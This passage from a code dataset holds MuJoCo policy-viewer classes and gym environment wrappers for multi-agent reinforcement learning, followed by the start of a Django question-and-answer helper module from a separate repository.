self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
while self.duration is None or time.time() < self.end_time or self.eval_episode <= self.eval_num:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
self.step += 1
#READ INFO
self.test_lock_rate[self.step] = env_info['lock_rate']
self.test_return_rate[self.step] = env_info['return_rate']
if env_info['lock_rate'] == 1:
self.test_success_rate[self.step] = env_info['return_rate']
else:
self.test_success_rate[self.step] = 0
#print(self.dict_obs['box_obs'][0][0])
self.total_rew += rew
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False) or self.step >= self.args.episode_length - 1:
self.eval_episode += 1
self.success_rate_sum += np.mean(self.test_success_rate[-self.H:])
print("Test Episode %d/%d Success Rate:"%(self.eval_episode, self.eval_num), np.mean(self.test_success_rate[-self.H:]))
if self.eval_episode == self.eval_num:
break
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
if self.eval_episode == self.eval_num:
print("Mean Success Rate:", self.success_rate_sum / self.eval_num)
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
print("[starts]", self.starts[self.eval_episode])
self.dict_obs = self.env.reset(self.starts[self.eval_episode])
self.obs = []
self.share_obs = []
# reset the buffer
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
self.step = 0
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_sc(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.dict_obs = env.reset()
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','food_obs','observation_self']
self.mask_order_obs = ['mask_aa_obs','mask_ab_obs','mask_ar_obs','mask_af_obs',None]
'''
self.order_obs = ['box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
self.mask_order_obs = ['mask_ab_obs','mask_ar_obs',None,None,None]
self.num_agents = 1
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
print(self.dict_obs)
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
print(self.obs)
print(self.share_obs)
while self.duration is None or time.time() < self.end_time:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
print(action_pull)
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
print(self.dict_obs)
self.total_rew += rew
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_bc(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.dict_obs = env.reset()
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','food_obs','observation_self']
self.mask_order_obs = ['mask_aa_obs','mask_ab_obs','mask_ar_obs','mask_af_obs',None]
'''
'''
self.order_obs = ['box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
self.mask_order_obs = [None,'mask_ar_obs',None,None,None]
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
self.mask_order_obs = [None,None,'mask_ar_obs',None,None,None]
self.num_agents = 2
for agent_id in range(self.num_agents):
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
while self.duration is None or time.time() < self.end_time:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
#print(self.dict_obs)
self.total_rew += rew
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
```
#### File: hns/wrappers/util.py
```python
import gym
from mujoco_py import MujocoException
from gym.spaces import Dict, Box
import numpy as np
from copy import deepcopy
import logging
def update_obs_space(env, delta):
spaces = env.observation_space.spaces.copy()
for key, shape in delta.items():
spaces[key] = Box(-np.inf, np.inf, shape, np.float32)
return Dict(spaces)
class NumpyArrayRewardWrapper(gym.RewardWrapper):
"""
Convenience wrapper that casts rewards to the multiagent format
(numpy array of shape (n_agents,))
"""
def __init__(self, env):
super().__init__(env)
def reward(self, rew):
return np.zeros((self.unwrapped.n_agents,)) + rew
class DiscretizeActionWrapper(gym.ActionWrapper):
'''
Take a Box action and convert it to a MultiDiscrete Action through quantization
Args:
action_key: (string) action to discretize
nbuckets: (int) number of discrete actions per dimension. It should be odd such
that actions centered around 0 will have the middle action be 0.
'''
def __init__(self, env, action_key, nbuckets=11):
super().__init__(env)
self.action_key = action_key
self.discrete_to_continuous_act_map = []
for i, ac_space in enumerate(self.action_space.spaces[action_key].spaces):
assert isinstance(ac_space, Box)
action_map = np.array([np.linspace(low, high, nbuckets)
for low, high in zip(ac_space.low, ac_space.high)])
_nbuckets = np.ones((len(action_map))) * nbuckets
self.action_space.spaces[action_key].spaces[i] = gym.spaces.MultiDiscrete(_nbuckets)
self.discrete_to_continuous_act_map.append(action_map)
self.discrete_to_continuous_act_map = np.array(self.discrete_to_continuous_act_map)
def action(self, action):
action = deepcopy(action)
ac = action[self.action_key]
# helper variables for indexing the discrete-to-continuous action map
agent_idxs = np.tile(np.arange(ac.shape[0])[:, None], ac.shape[1])
ac_idxs = np.tile(np.arange(ac.shape[1]), ac.shape[0]).reshape(ac.shape)
action[self.action_key] = self.discrete_to_continuous_act_map[agent_idxs, ac_idxs, ac]
return action
class DiscardMujocoExceptionEpisodes(gym.Wrapper):
'''
Catches Mujoco Exceptions. Sends signal to discard Episode.
'''
def __init__(self, env, n_agents):
super().__init__(env)
self.episode_error = False
self.n_agents = n_agents
def step(self, action):
assert not self.episode_error, "Won't Continue Episode After Mujoco Exception -- \
Please discard episode and reset. If info['discard_episode'] is True the episode\
should be discarded"
try:
obs, rew, done, info = self.env.step(action)
info['discard_episode'] = False
except MujocoException as e:
self.episode_error = True
# Done is set to False such that rollout workers do not accidently send data in
# the event that timelimit is up in the same step as an error occured.
print("mujuco error incurs, discard episode.")
obs, rew, done, info = {}, np.zeros(self.n_agents), True, {'discard_episode': True}
logging.info(str(e))
logging.info("Encountered Mujoco Exception During Environment Step.\
Reset Episode Required")
return obs, rew, done, info
def reset(self):
try:
obs = self.env.reset()
except MujocoException:
logging.info("Encountered Mujoco Exception During Environment Reset.\
Trying Reset Again")
obs = self.reset()
self.episode_error = False
return obs
class MaskActionWrapper(gym.Wrapper):
'''
For a boolean action, sets it to zero given a mask from the previous step.
For example you could mask the grab action based on whether you can see the box
Args:
action_key (string): key in action dictionary to be masked
mask_keys (string): keys in observation dictionary with which to mask. The shape
of the concatenation of the masks (along the 1st dimension) should exactly
match that of action_key
'''
def __init__(self, env, action_key, mask_keys):
super().__init__(env)
self.action_key = action_key
self.mask_keys = mask_keys
def reset(self):
self.prev_obs = self.env.reset()
return deepcopy(self.prev_obs)
def step(self, action):
#import pdb; pdb.set_trace()
mask = np.concatenate([self.prev_obs[k] for k in self.mask_keys], -1)
action[self.action_key] = np.logical_and(action[self.action_key], mask)
self.prev_obs, rew, done, info = self.env.step(action)
return deepcopy(self.prev_obs), rew, done, info
class AddConstantObservationsWrapper(gym.ObservationWrapper):
'''
Adds new constant observations to the environment.
Args:
new_obs: Dictionary with the new observations.
'''
def __init__(self, env, new_obs):
super().__init__(env)
self.new_obs = new_obs
for obs_key in self.new_obs:
assert obs_key not in self.observation_space.spaces, (
f'Observation key {obs_key} exists in original observation space')
if type(self.new_obs[obs_key]) in [list, tuple]:
self.new_obs[obs_key] = np.array(self.new_obs[obs_key])
shape = self.new_obs[obs_key].shape
self.observation_space = update_obs_space(self, {obs_key: shape})
def observation(self, obs):
for key, val in self.new_obs.items():
obs[key] = val
return obs
class SpoofEntityWrapper(gym.ObservationWrapper):
'''
Add extra entities along entity dimension such that shapes can match between
environments with differing number of entities. This is meant to be used
after SplitObservations and SelectKeysWrapper. This will also add masks that are
1 except along the new columns (which could be used by fully observed value function)
Args:
total_n_entities (int): total number of entities after spoofing (including spoofed ones)
keys (list): observation keys with which to add entities along the second dimension
mask_keys (list): mask keys with which to add columns.
'''
def __init__(self, env, total_n_entities, keys, mask_keys):
super().__init__(env)
self.total_n_entities = total_n_entities
self.keys = keys
self.mask_keys = mask_keys
for key in self.keys + self.mask_keys:
shape = list(self.observation_space.spaces[key].shape)
shape[1] = total_n_entities
self.observation_space = update_obs_space(self, {key: shape})
for key in self.mask_keys:
shape = list(self.observation_space.spaces[key].shape)
self.observation_space = update_obs_space(self, {key + '_spoof': shape})
def observation(self, obs):
for key in self.keys:
n_to_spoof = self.total_n_entities - obs[key].shape[1]
if n_to_spoof > 0:
obs[key] = np.concatenate([obs[key], np.zeros((obs[key].shape[0], n_to_spoof, obs[key].shape[-1]))], 1)
for key in self.mask_keys:
n_to_spoof = self.total_n_entities - obs[key].shape[1]
obs[key + '_spoof'] = np.concatenate([np.ones_like(obs[key]), np.zeros((obs[key].shape[0], n_to_spoof))], -1)
if n_to_spoof > 0:
obs[key] = np.concatenate([obs[key], np.zeros((obs[key].shape[0], n_to_spoof))], -1)
return obs
class ConcatenateObsWrapper(gym.ObservationWrapper):
'''
Group multiple observations under the same key in the observation dictionary.
Args:
obs_groups: dict of {key_to_save: [keys to concat]}
'''
def __init__(self, env, obs_groups):
super().__init__(env)
self.obs_groups = obs_groups
for key_to_save, keys_to_concat in obs_groups.items():
assert np.all([np.array(self.observation_space.spaces[keys_to_concat[0]].shape[:-1]) ==
np.array(self.observation_space.spaces[k].shape[:-1])
for k in keys_to_concat]), \
f"Spaces were {[(k, v) for k, v in self.observation_space.spaces.items() if k in keys_to_concat]}"
new_last_dim = sum([self.observation_space.spaces[k].shape[-1] for k in keys_to_concat])
new_shape = list(self.observation_space.spaces[keys_to_concat[0]].shape[:-1]) + [new_last_dim]
self.observation_space = update_obs_space(self, {key_to_save: new_shape})
'''
def observation(self, obs):
for key_to_save, keys_to_concat in self.obs_groups.items():
for k in keys_to_concat:
if k not in obs.keys():
print(keys_to_concat)
print(obs.keys())
assert 0
obs[key_to_save] = np.concatenate([obs[k] for k in keys_to_concat], -1)
return obs
'''
def observation(self, obs):
for key_to_save, keys_to_concat in self.obs_groups.items():
temp_obs = []
for k in keys_to_concat:
if k in obs.keys():
temp_obs.append(obs[k])
if key_to_save in obs.keys():
obs[key_to_save] = np.concatenate(temp_obs, -1)
return obs
``` |
{
"source": "jiayueru/YPPF",
"score": 2
} |
#### File: YPPF/app/QA_utils.py
```python
from app.utils_dependency import *
from app.models import (
NaturalPerson,
Organization,
Notification,
QandA,
)
from app.notification_utils import notification_create
from app import utils
def QA_create(sender, receiver, Q_text, anonymous_flag=False):
# sender: user
# receiver: user
# Q_text: str(提问内容)
# anonymous_flag: 是否匿名
new_qa = QandA.objects.create(
sender=sender,
receiver=receiver,
Q_text=Q_text,
anonymous_flag=anonymous_flag,
)
notification_create(
receiver=receiver,
sender=sender,
typename=Notification.Type.NEEDREAD,
title="您收到了一条提问",
content="请点击本条通知的标题,进入问答中心查看我的提问!",
URL='/QAcenter/',
anonymous_flag=anonymous_flag
)
def QA_anwser(QA_id, A_text):
with transaction.atomic():
qa = QandA.objects.select_for_update().get(id=QA_id)
qa.A_text = A_text
qa.save()
notification_create(
receiver=qa.sender,
sender=qa.receiver,
typename=Notification.Type.NEEDREAD,
title="您收到了一条回答",
content=A_text,
URL='/QAcenter/',
)
def QA_ignore(QA_id, sender_flag=True):
with transaction.atomic():
qa = QandA.objects.select_for_update().get(id=QA_id)
# 如果两边都ignore了,就delete
if sender_flag:
